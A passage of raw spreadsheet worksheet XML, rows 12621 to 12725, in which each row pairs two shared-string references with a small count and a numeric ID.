        <v>2209</v>
      </c>
    </row>
    <row r="12621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12621" t="s">
        <v>16228</v>
      </c>
      <c r="B12621" t="s">
        <v>16213</v>
      </c>
      <c r="C12621">
        <v>0</v>
      </c>
      <c r="D12621">
        <v>2209</v>
      </c>
    </row>
    <row r="12622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12622" t="s">
        <v>16231</v>
      </c>
      <c r="B12622" t="s">
        <v>16214</v>
      </c>
      <c r="C12622">
        <v>0</v>
      </c>
      <c r="D12622">
        <v>2209</v>
      </c>
    </row>
    <row r="12623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12623" t="s">
        <v>16228</v>
      </c>
      <c r="B12623" t="s">
        <v>16215</v>
      </c>
      <c r="C12623">
        <v>0</v>
      </c>
      <c r="D12623">
        <v>2209</v>
      </c>
    </row>
    <row r="12624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12624" t="s">
        <v>16231</v>
      </c>
      <c r="B12624" t="s">
        <v>16216</v>
      </c>
      <c r="C12624">
        <v>1</v>
      </c>
      <c r="D12624">
        <v>2209</v>
      </c>
    </row>
    <row r="12625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12625" t="s">
        <v>16228</v>
      </c>
      <c r="B12625" t="s">
        <v>16217</v>
      </c>
      <c r="C12625">
        <v>0</v>
      </c>
      <c r="D12625">
        <v>2209</v>
      </c>
    </row>
    <row r="12626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12626" t="s">
        <v>16231</v>
      </c>
      <c r="B12626" t="s">
        <v>16218</v>
      </c>
      <c r="C12626">
        <v>5</v>
      </c>
      <c r="D12626">
        <v>2209</v>
      </c>
    </row>
    <row r="12627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12627" t="s">
        <v>16229</v>
      </c>
      <c r="B12627" t="s">
        <v>16219</v>
      </c>
      <c r="C12627">
        <v>0</v>
      </c>
      <c r="D12627">
        <v>2209</v>
      </c>
    </row>
    <row r="12628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12628" t="s">
        <v>16230</v>
      </c>
      <c r="B12628" t="s">
        <v>16220</v>
      </c>
      <c r="C12628">
        <v>0</v>
      </c>
      <c r="D12628">
        <v>2209</v>
      </c>
    </row>
    <row r="12629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12629" t="s">
        <v>16229</v>
      </c>
      <c r="B12629" t="s">
        <v>16221</v>
      </c>
      <c r="C12629">
        <v>0</v>
      </c>
      <c r="D12629">
        <v>2209</v>
      </c>
    </row>
    <row r="12630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12630" t="s">
        <v>16230</v>
      </c>
      <c r="B12630" t="s">
        <v>16222</v>
      </c>
      <c r="C12630">
        <v>1</v>
      </c>
      <c r="D12630">
        <v>2209</v>
      </c>
    </row>
    <row r="12631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12631" t="s">
        <v>16223</v>
      </c>
      <c r="B12631" t="s">
        <v>16223</v>
      </c>
      <c r="C12631">
        <v>26</v>
      </c>
      <c r="D12631">
        <v>2209</v>
      </c>
    </row>
    <row r="12632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12632" t="s">
        <v>16224</v>
      </c>
      <c r="B12632" t="s">
        <v>16224</v>
      </c>
      <c r="C12632">
        <v>0</v>
      </c>
      <c r="D12632">
        <v>2209</v>
      </c>
    </row>
    <row r="12633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12633" t="s">
        <v>16228</v>
      </c>
      <c r="B12633" t="s">
        <v>16215</v>
      </c>
      <c r="C12633">
        <v>1</v>
      </c>
      <c r="D12633">
        <v>2209</v>
      </c>
    </row>
    <row r="12634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12634" t="s">
        <v>16228</v>
      </c>
      <c r="B12634" t="s">
        <v>16211</v>
      </c>
      <c r="C12634">
        <v>0</v>
      </c>
      <c r="D12634">
        <v>1047</v>
      </c>
    </row>
    <row r="12635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12635" t="s">
        <v>16231</v>
      </c>
      <c r="B12635" t="s">
        <v>16212</v>
      </c>
      <c r="C12635">
        <v>0</v>
      </c>
      <c r="D12635">
        <v>1047</v>
      </c>
    </row>
    <row r="12636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12636" t="s">
        <v>16228</v>
      </c>
      <c r="B12636" t="s">
        <v>16213</v>
      </c>
      <c r="C12636">
        <v>0</v>
      </c>
      <c r="D12636">
        <v>1047</v>
      </c>
    </row>
    <row r="12637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12637" t="s">
        <v>16231</v>
      </c>
      <c r="B12637" t="s">
        <v>16214</v>
      </c>
      <c r="C12637">
        <v>0</v>
      </c>
      <c r="D12637">
        <v>1047</v>
      </c>
    </row>
    <row r="12638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12638" t="s">
        <v>16228</v>
      </c>
      <c r="B12638" t="s">
        <v>16215</v>
      </c>
      <c r="C12638">
        <v>2</v>
      </c>
      <c r="D12638">
        <v>1047</v>
      </c>
    </row>
    <row r="12639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12639" t="s">
        <v>16231</v>
      </c>
      <c r="B12639" t="s">
        <v>16216</v>
      </c>
      <c r="C12639">
        <v>0</v>
      </c>
      <c r="D12639">
        <v>1047</v>
      </c>
    </row>
    <row r="12640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12640" t="s">
        <v>16228</v>
      </c>
      <c r="B12640" t="s">
        <v>16217</v>
      </c>
      <c r="C12640">
        <v>3</v>
      </c>
      <c r="D12640">
        <v>1047</v>
      </c>
    </row>
    <row r="12641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12641" t="s">
        <v>16231</v>
      </c>
      <c r="B12641" t="s">
        <v>16218</v>
      </c>
      <c r="C12641">
        <v>0</v>
      </c>
      <c r="D12641">
        <v>1047</v>
      </c>
    </row>
    <row r="12642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12642" t="s">
        <v>16229</v>
      </c>
      <c r="B12642" t="s">
        <v>16219</v>
      </c>
      <c r="C12642">
        <v>0</v>
      </c>
      <c r="D12642">
        <v>1047</v>
      </c>
    </row>
    <row r="12643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12643" t="s">
        <v>16230</v>
      </c>
      <c r="B12643" t="s">
        <v>16220</v>
      </c>
      <c r="C12643">
        <v>0</v>
      </c>
      <c r="D12643">
        <v>1047</v>
      </c>
    </row>
    <row r="12644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12644" t="s">
        <v>16229</v>
      </c>
      <c r="B12644" t="s">
        <v>16221</v>
      </c>
      <c r="C12644">
        <v>0</v>
      </c>
      <c r="D12644">
        <v>1047</v>
      </c>
    </row>
    <row r="12645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12645" t="s">
        <v>16230</v>
      </c>
      <c r="B12645" t="s">
        <v>16222</v>
      </c>
      <c r="C12645">
        <v>0</v>
      </c>
      <c r="D12645">
        <v>1047</v>
      </c>
    </row>
    <row r="12646" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12646" t="s">
        <v>16223</v>
      </c>
      <c r="B12646" t="s">
        <v>16223</v>
      </c>
      <c r="C12646">
        <v>5</v>
      </c>
      <c r="D12646">
        <v>1047</v>
      </c>
    </row>
    <row r="12647" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12647" t="s">
        <v>16224</v>
      </c>
      <c r="B12647" t="s">
        <v>16224</v>
      </c>
      <c r="C12647">
        <v>2</v>
      </c>
      <c r="D12647">
        <v>1047</v>
      </c>
    </row>
    <row r="12648" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12648" t="s">
        <v>16228</v>
      </c>
      <c r="B12648" t="s">
        <v>16211</v>
      </c>
      <c r="C12648">
        <v>0</v>
      </c>
      <c r="D12648">
        <v>1347</v>
      </c>
    </row>
    <row r="12649" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12649" t="s">
        <v>16231</v>
      </c>
      <c r="B12649" t="s">
        <v>16212</v>
      </c>
      <c r="C12649">
        <v>0</v>
      </c>
      <c r="D12649">
        <v>1347</v>
      </c>
    </row>
    <row r="12650" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12650" t="s">
        <v>16228</v>
      </c>
      <c r="B12650" t="s">
        <v>16213</v>
      </c>
      <c r="C12650">
        <v>0</v>
      </c>
      <c r="D12650">
        <v>1347</v>
      </c>
    </row>
    <row r="12651" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12651" t="s">
        <v>16231</v>
      </c>
      <c r="B12651" t="s">
        <v>16214</v>
      </c>
      <c r="C12651">
        <v>0</v>
      </c>
      <c r="D12651">
        <v>1347</v>
      </c>
    </row>
    <row r="12652" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12652" t="s">
        <v>16228</v>
      </c>
      <c r="B12652" t="s">
        <v>16215</v>
      </c>
      <c r="C12652">
        <v>10</v>
      </c>
      <c r="D12652">
        <v>1347</v>
      </c>
    </row>
    <row r="12653" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12653" t="s">
        <v>16231</v>
      </c>
      <c r="B12653" t="s">
        <v>16216</v>
      </c>
      <c r="C12653">
        <v>3</v>
      </c>
      <c r="D12653">
        <v>1347</v>
      </c>
    </row>
    <row r="12654" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12654" t="s">
        <v>16228</v>
      </c>
      <c r="B12654" t="s">
        <v>16217</v>
      </c>
      <c r="C12654">
        <v>0</v>
      </c>
      <c r="D12654">
        <v>1347</v>
      </c>
    </row>
    <row r="12655" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12655" t="s">
        <v>16231</v>
      </c>
      <c r="B12655" t="s">
        <v>16218</v>
      </c>
      <c r="C12655">
        <v>0</v>
      </c>
      <c r="D12655">
        <v>1347</v>
      </c>
    </row>
    <row r="12656" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12656" t="s">
        <v>16229</v>
      </c>
      <c r="B12656" t="s">
        <v>16219</v>
      </c>
      <c r="C12656">
        <v>0</v>
      </c>
      <c r="D12656">
        <v>1347</v>
      </c>
    </row>
    <row r="12657" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12657" t="s">
        <v>16230</v>
      </c>
      <c r="B12657" t="s">
        <v>16220</v>
      </c>
      <c r="C12657">
        <v>0</v>
      </c>
      <c r="D12657">
        <v>1347</v>
      </c>
    </row>
    <row r="12658" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12658" t="s">
        <v>16229</v>
      </c>
      <c r="B12658" t="s">
        <v>16221</v>
      </c>
      <c r="C12658">
        <v>23</v>
      </c>
      <c r="D12658">
        <v>1347</v>
      </c>
    </row>
    <row r="12659" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12659" t="s">
        <v>16230</v>
      </c>
      <c r="B12659" t="s">
        <v>16222</v>
      </c>
      <c r="C12659">
        <v>7</v>
      </c>
      <c r="D12659">
        <v>1347</v>
      </c>
    </row>
    <row r="12660" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12660" t="s">
        <v>16223</v>
      </c>
      <c r="B12660" t="s">
        <v>16223</v>
      </c>
      <c r="C12660">
        <v>20</v>
      </c>
      <c r="D12660">
        <v>1347</v>
      </c>
    </row>
    <row r="12661" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12661" t="s">
        <v>16224</v>
      </c>
      <c r="B12661" t="s">
        <v>16224</v>
      </c>
      <c r="C12661">
        <v>2</v>
      </c>
      <c r="D12661">
        <v>1347</v>
      </c>
    </row>
    <row r="12662" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12662" t="s">
        <v>16228</v>
      </c>
      <c r="B12662" t="s">
        <v>16211</v>
      </c>
      <c r="C12662">
        <v>0</v>
      </c>
      <c r="D12662">
        <v>5065</v>
      </c>
    </row>
    <row r="12663" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12663" t="s">
        <v>16231</v>
      </c>
      <c r="B12663" t="s">
        <v>16212</v>
      </c>
      <c r="C12663">
        <v>0</v>
      </c>
      <c r="D12663">
        <v>5065</v>
      </c>
    </row>
    <row r="12664" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12664" t="s">
        <v>16228</v>
      </c>
      <c r="B12664" t="s">
        <v>16213</v>
      </c>
      <c r="C12664">
        <v>0</v>
      </c>
      <c r="D12664">
        <v>5065</v>
      </c>
    </row>
    <row r="12665" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12665" t="s">
        <v>16231</v>
      </c>
      <c r="B12665" t="s">
        <v>16214</v>
      </c>
      <c r="C12665">
        <v>0</v>
      </c>
      <c r="D12665">
        <v>5065</v>
      </c>
    </row>
    <row r="12666" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12666" t="s">
        <v>16228</v>
      </c>
      <c r="B12666" t="s">
        <v>16215</v>
      </c>
      <c r="C12666">
        <v>0</v>
      </c>
      <c r="D12666">
        <v>5065</v>
      </c>
    </row>
    <row r="12667" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12667" t="s">
        <v>16231</v>
      </c>
      <c r="B12667" t="s">
        <v>16216</v>
      </c>
      <c r="C12667">
        <v>1</v>
      </c>
      <c r="D12667">
        <v>5065</v>
      </c>
    </row>
    <row r="12668" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12668" t="s">
        <v>16228</v>
      </c>
      <c r="B12668" t="s">
        <v>16217</v>
      </c>
      <c r="C12668">
        <v>0</v>
      </c>
      <c r="D12668">
        <v>5065</v>
      </c>
    </row>
    <row r="12669" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12669" t="s">
        <v>16231</v>
      </c>
      <c r="B12669" t="s">
        <v>16218</v>
      </c>
      <c r="C12669">
        <v>0</v>
      </c>
      <c r="D12669">
        <v>5065</v>
      </c>
    </row>
    <row r="12670" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12670" t="s">
        <v>16229</v>
      </c>
      <c r="B12670" t="s">
        <v>16219</v>
      </c>
      <c r="C12670">
        <v>0</v>
      </c>
      <c r="D12670">
        <v>5065</v>
      </c>
    </row>
    <row r="12671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12671" t="s">
        <v>16230</v>
      </c>
      <c r="B12671" t="s">
        <v>16220</v>
      </c>
      <c r="C12671">
        <v>0</v>
      </c>
      <c r="D12671">
        <v>5065</v>
      </c>
    </row>
    <row r="12672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12672" t="s">
        <v>16229</v>
      </c>
      <c r="B12672" t="s">
        <v>16221</v>
      </c>
      <c r="C12672">
        <v>2</v>
      </c>
      <c r="D12672">
        <v>5065</v>
      </c>
    </row>
    <row r="12673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12673" t="s">
        <v>16230</v>
      </c>
      <c r="B12673" t="s">
        <v>16222</v>
      </c>
      <c r="C12673">
        <v>5</v>
      </c>
      <c r="D12673">
        <v>5065</v>
      </c>
    </row>
    <row r="12674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12674" t="s">
        <v>16223</v>
      </c>
      <c r="B12674" t="s">
        <v>16223</v>
      </c>
      <c r="C12674">
        <v>26</v>
      </c>
      <c r="D12674">
        <v>5065</v>
      </c>
    </row>
    <row r="12675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12675" t="s">
        <v>16224</v>
      </c>
      <c r="B12675" t="s">
        <v>16224</v>
      </c>
      <c r="C12675">
        <v>1</v>
      </c>
      <c r="D12675">
        <v>5065</v>
      </c>
    </row>
    <row r="12676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12676" t="s">
        <v>16228</v>
      </c>
      <c r="B12676" t="s">
        <v>16211</v>
      </c>
      <c r="C12676">
        <v>0</v>
      </c>
      <c r="D12676">
        <v>1232</v>
      </c>
    </row>
    <row r="12677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12677" t="s">
        <v>16231</v>
      </c>
      <c r="B12677" t="s">
        <v>16212</v>
      </c>
      <c r="C12677">
        <v>0</v>
      </c>
      <c r="D12677">
        <v>1232</v>
      </c>
    </row>
    <row r="12678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12678" t="s">
        <v>16228</v>
      </c>
      <c r="B12678" t="s">
        <v>16213</v>
      </c>
      <c r="C12678">
        <v>0</v>
      </c>
      <c r="D12678">
        <v>1232</v>
      </c>
    </row>
    <row r="12679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12679" t="s">
        <v>16231</v>
      </c>
      <c r="B12679" t="s">
        <v>16214</v>
      </c>
      <c r="C12679">
        <v>0</v>
      </c>
      <c r="D12679">
        <v>1232</v>
      </c>
    </row>
    <row r="12680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12680" t="s">
        <v>16228</v>
      </c>
      <c r="B12680" t="s">
        <v>16215</v>
      </c>
      <c r="C12680">
        <v>2</v>
      </c>
      <c r="D12680">
        <v>1232</v>
      </c>
    </row>
    <row r="12681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12681" t="s">
        <v>16231</v>
      </c>
      <c r="B12681" t="s">
        <v>16216</v>
      </c>
      <c r="C12681">
        <v>0</v>
      </c>
      <c r="D12681">
        <v>1232</v>
      </c>
    </row>
    <row r="12682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12682" t="s">
        <v>16228</v>
      </c>
      <c r="B12682" t="s">
        <v>16217</v>
      </c>
      <c r="C12682">
        <v>0</v>
      </c>
      <c r="D12682">
        <v>1232</v>
      </c>
    </row>
    <row r="12683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12683" t="s">
        <v>16231</v>
      </c>
      <c r="B12683" t="s">
        <v>16218</v>
      </c>
      <c r="C12683">
        <v>0</v>
      </c>
      <c r="D12683">
        <v>1232</v>
      </c>
    </row>
    <row r="12684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12684" t="s">
        <v>16229</v>
      </c>
      <c r="B12684" t="s">
        <v>16219</v>
      </c>
      <c r="C12684">
        <v>1</v>
      </c>
      <c r="D12684">
        <v>1232</v>
      </c>
    </row>
    <row r="12685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12685" t="s">
        <v>16230</v>
      </c>
      <c r="B12685" t="s">
        <v>16220</v>
      </c>
      <c r="C12685">
        <v>1</v>
      </c>
      <c r="D12685">
        <v>1232</v>
      </c>
    </row>
    <row r="12686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12686" t="s">
        <v>16229</v>
      </c>
      <c r="B12686" t="s">
        <v>16221</v>
      </c>
      <c r="C12686">
        <v>12</v>
      </c>
      <c r="D12686">
        <v>1232</v>
      </c>
    </row>
    <row r="12687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12687" t="s">
        <v>16230</v>
      </c>
      <c r="B12687" t="s">
        <v>16222</v>
      </c>
      <c r="C12687">
        <v>3</v>
      </c>
      <c r="D12687">
        <v>1232</v>
      </c>
    </row>
    <row r="12688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12688" t="s">
        <v>16223</v>
      </c>
      <c r="B12688" t="s">
        <v>16223</v>
      </c>
      <c r="C12688">
        <v>0</v>
      </c>
      <c r="D12688">
        <v>1232</v>
      </c>
    </row>
    <row r="12689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12689" t="s">
        <v>16224</v>
      </c>
      <c r="B12689" t="s">
        <v>16224</v>
      </c>
      <c r="C12689">
        <v>0</v>
      </c>
      <c r="D12689">
        <v>1232</v>
      </c>
    </row>
    <row r="12690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12690" t="s">
        <v>16228</v>
      </c>
      <c r="B12690" t="s">
        <v>16211</v>
      </c>
      <c r="C12690">
        <v>0</v>
      </c>
      <c r="D12690">
        <v>5053</v>
      </c>
    </row>
    <row r="12691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12691" t="s">
        <v>16231</v>
      </c>
      <c r="B12691" t="s">
        <v>16212</v>
      </c>
      <c r="C12691">
        <v>0</v>
      </c>
      <c r="D12691">
        <v>5053</v>
      </c>
    </row>
    <row r="12692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12692" t="s">
        <v>16228</v>
      </c>
      <c r="B12692" t="s">
        <v>16213</v>
      </c>
      <c r="C12692">
        <v>0</v>
      </c>
      <c r="D12692">
        <v>5053</v>
      </c>
    </row>
    <row r="12693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12693" t="s">
        <v>16231</v>
      </c>
      <c r="B12693" t="s">
        <v>16214</v>
      </c>
      <c r="C12693">
        <v>0</v>
      </c>
      <c r="D12693">
        <v>5053</v>
      </c>
    </row>
    <row r="12694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12694" t="s">
        <v>16228</v>
      </c>
      <c r="B12694" t="s">
        <v>16215</v>
      </c>
      <c r="C12694">
        <v>0</v>
      </c>
      <c r="D12694">
        <v>5053</v>
      </c>
    </row>
    <row r="12695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12695" t="s">
        <v>16231</v>
      </c>
      <c r="B12695" t="s">
        <v>16216</v>
      </c>
      <c r="C12695">
        <v>3</v>
      </c>
      <c r="D12695">
        <v>5053</v>
      </c>
    </row>
    <row r="12696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12696" t="s">
        <v>16228</v>
      </c>
      <c r="B12696" t="s">
        <v>16217</v>
      </c>
      <c r="C12696">
        <v>6</v>
      </c>
      <c r="D12696">
        <v>5053</v>
      </c>
    </row>
    <row r="12697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12697" t="s">
        <v>16231</v>
      </c>
      <c r="B12697" t="s">
        <v>16218</v>
      </c>
      <c r="C12697">
        <v>2</v>
      </c>
      <c r="D12697">
        <v>5053</v>
      </c>
    </row>
    <row r="12698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12698" t="s">
        <v>16229</v>
      </c>
      <c r="B12698" t="s">
        <v>16219</v>
      </c>
      <c r="C12698">
        <v>0</v>
      </c>
      <c r="D12698">
        <v>5053</v>
      </c>
    </row>
    <row r="12699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12699" t="s">
        <v>16230</v>
      </c>
      <c r="B12699" t="s">
        <v>16220</v>
      </c>
      <c r="C12699">
        <v>0</v>
      </c>
      <c r="D12699">
        <v>5053</v>
      </c>
    </row>
    <row r="12700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12700" t="s">
        <v>16229</v>
      </c>
      <c r="B12700" t="s">
        <v>16221</v>
      </c>
      <c r="C12700">
        <v>0</v>
      </c>
      <c r="D12700">
        <v>5053</v>
      </c>
    </row>
    <row r="12701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12701" t="s">
        <v>16230</v>
      </c>
      <c r="B12701" t="s">
        <v>16222</v>
      </c>
      <c r="C12701">
        <v>0</v>
      </c>
      <c r="D12701">
        <v>5053</v>
      </c>
    </row>
    <row r="12702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12702" t="s">
        <v>16223</v>
      </c>
      <c r="B12702" t="s">
        <v>16223</v>
      </c>
      <c r="C12702">
        <v>26</v>
      </c>
      <c r="D12702">
        <v>5053</v>
      </c>
    </row>
    <row r="12703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12703" t="s">
        <v>16224</v>
      </c>
      <c r="B12703" t="s">
        <v>16224</v>
      </c>
      <c r="C12703">
        <v>1</v>
      </c>
      <c r="D12703">
        <v>5053</v>
      </c>
    </row>
    <row r="12704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12704" t="s">
        <v>16230</v>
      </c>
      <c r="B12704" t="s">
        <v>16222</v>
      </c>
      <c r="C12704">
        <v>11</v>
      </c>
      <c r="D12704">
        <v>4944</v>
      </c>
    </row>
    <row r="12705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12705" t="s">
        <v>16228</v>
      </c>
      <c r="B12705" t="s">
        <v>16211</v>
      </c>
      <c r="C12705">
        <v>0</v>
      </c>
      <c r="D12705">
        <v>5061</v>
      </c>
    </row>
    <row r="12706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12706" t="s">
        <v>16231</v>
      </c>
      <c r="B12706" t="s">
        <v>16212</v>
      </c>
      <c r="C12706">
        <v>0</v>
      </c>
      <c r="D12706">
        <v>5061</v>
      </c>
    </row>
    <row r="12707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12707" t="s">
        <v>16228</v>
      </c>
      <c r="B12707" t="s">
        <v>16213</v>
      </c>
      <c r="C12707">
        <v>0</v>
      </c>
      <c r="D12707">
        <v>5061</v>
      </c>
    </row>
    <row r="12708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12708" t="s">
        <v>16231</v>
      </c>
      <c r="B12708" t="s">
        <v>16214</v>
      </c>
      <c r="C12708">
        <v>0</v>
      </c>
      <c r="D12708">
        <v>5061</v>
      </c>
    </row>
    <row r="12709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12709" t="s">
        <v>16228</v>
      </c>
      <c r="B12709" t="s">
        <v>16215</v>
      </c>
      <c r="C12709">
        <v>1</v>
      </c>
      <c r="D12709">
        <v>5061</v>
      </c>
    </row>
    <row r="12710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12710" t="s">
        <v>16231</v>
      </c>
      <c r="B12710" t="s">
        <v>16216</v>
      </c>
      <c r="C12710">
        <v>0</v>
      </c>
      <c r="D12710">
        <v>5061</v>
      </c>
    </row>
    <row r="12711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12711" t="s">
        <v>16228</v>
      </c>
      <c r="B12711" t="s">
        <v>16217</v>
      </c>
      <c r="C12711">
        <v>2</v>
      </c>
      <c r="D12711">
        <v>5061</v>
      </c>
    </row>
    <row r="12712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12712" t="s">
        <v>16231</v>
      </c>
      <c r="B12712" t="s">
        <v>16218</v>
      </c>
      <c r="C12712">
        <v>0</v>
      </c>
      <c r="D12712">
        <v>5061</v>
      </c>
    </row>
    <row r="12713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12713" t="s">
        <v>16229</v>
      </c>
      <c r="B12713" t="s">
        <v>16219</v>
      </c>
      <c r="C12713">
        <v>0</v>
      </c>
      <c r="D12713">
        <v>5061</v>
      </c>
    </row>
    <row r="12714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12714" t="s">
        <v>16230</v>
      </c>
      <c r="B12714" t="s">
        <v>16220</v>
      </c>
      <c r="C12714">
        <v>2</v>
      </c>
      <c r="D12714">
        <v>5061</v>
      </c>
    </row>
    <row r="12715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12715" t="s">
        <v>16229</v>
      </c>
      <c r="B12715" t="s">
        <v>16221</v>
      </c>
      <c r="C12715">
        <v>10</v>
      </c>
      <c r="D12715">
        <v>5061</v>
      </c>
    </row>
    <row r="12716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12716" t="s">
        <v>16230</v>
      </c>
      <c r="B12716" t="s">
        <v>16222</v>
      </c>
      <c r="C12716">
        <v>5</v>
      </c>
      <c r="D12716">
        <v>5061</v>
      </c>
    </row>
    <row r="12717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12717" t="s">
        <v>16223</v>
      </c>
      <c r="B12717" t="s">
        <v>16223</v>
      </c>
      <c r="C12717">
        <v>0</v>
      </c>
      <c r="D12717">
        <v>5061</v>
      </c>
    </row>
    <row r="12718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12718" t="s">
        <v>16224</v>
      </c>
      <c r="B12718" t="s">
        <v>16224</v>
      </c>
      <c r="C12718">
        <v>0</v>
      </c>
      <c r="D12718">
        <v>5061</v>
      </c>
    </row>
    <row r="12719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12719" t="s">
        <v>16228</v>
      </c>
      <c r="B12719" t="s">
        <v>16211</v>
      </c>
      <c r="C12719">
        <v>0</v>
      </c>
      <c r="D12719">
        <v>4922</v>
      </c>
    </row>
    <row r="12720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12720" t="s">
        <v>16231</v>
      </c>
      <c r="B12720" t="s">
        <v>16212</v>
      </c>
      <c r="C12720">
        <v>0</v>
      </c>
      <c r="D12720">
        <v>4922</v>
      </c>
    </row>
    <row r="12721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12721" t="s">
        <v>16228</v>
      </c>
      <c r="B12721" t="s">
        <v>16213</v>
      </c>
      <c r="C12721">
        <v>0</v>
      </c>
      <c r="D12721">
        <v>4922</v>
      </c>
    </row>
    <row r="12722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12722" t="s">
        <v>16231</v>
      </c>
      <c r="B12722" t="s">
        <v>16214</v>
      </c>
      <c r="C12722">
        <v>0</v>
      </c>
      <c r="D12722">
        <v>4922</v>
      </c>
    </row>
    <row r="12723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12723" t="s">
        <v>16228</v>
      </c>
      <c r="B12723" t="s">
        <v>16215</v>
      </c>
      <c r="C12723">
        <v>0</v>
      </c>
      <c r="D12723">
        <v>4922</v>
      </c>
    </row>
    <row r="12724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12724" t="s">
        <v>16231</v>
      </c>
      <c r="B12724" t="s">
        <v>16216</v>
      </c>
      <c r="C12724">
        <v>1</v>
      </c>
      <c r="D12724">
        <v>4922</v>
      </c>
    </row>
    <row r="12725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12725" t="s">
        <v>16228</v>
      </c>
      <c r="B12725" t="s">
        <v>16217</v>
      </c>
      <c r="C12725">
        <v>4</v>
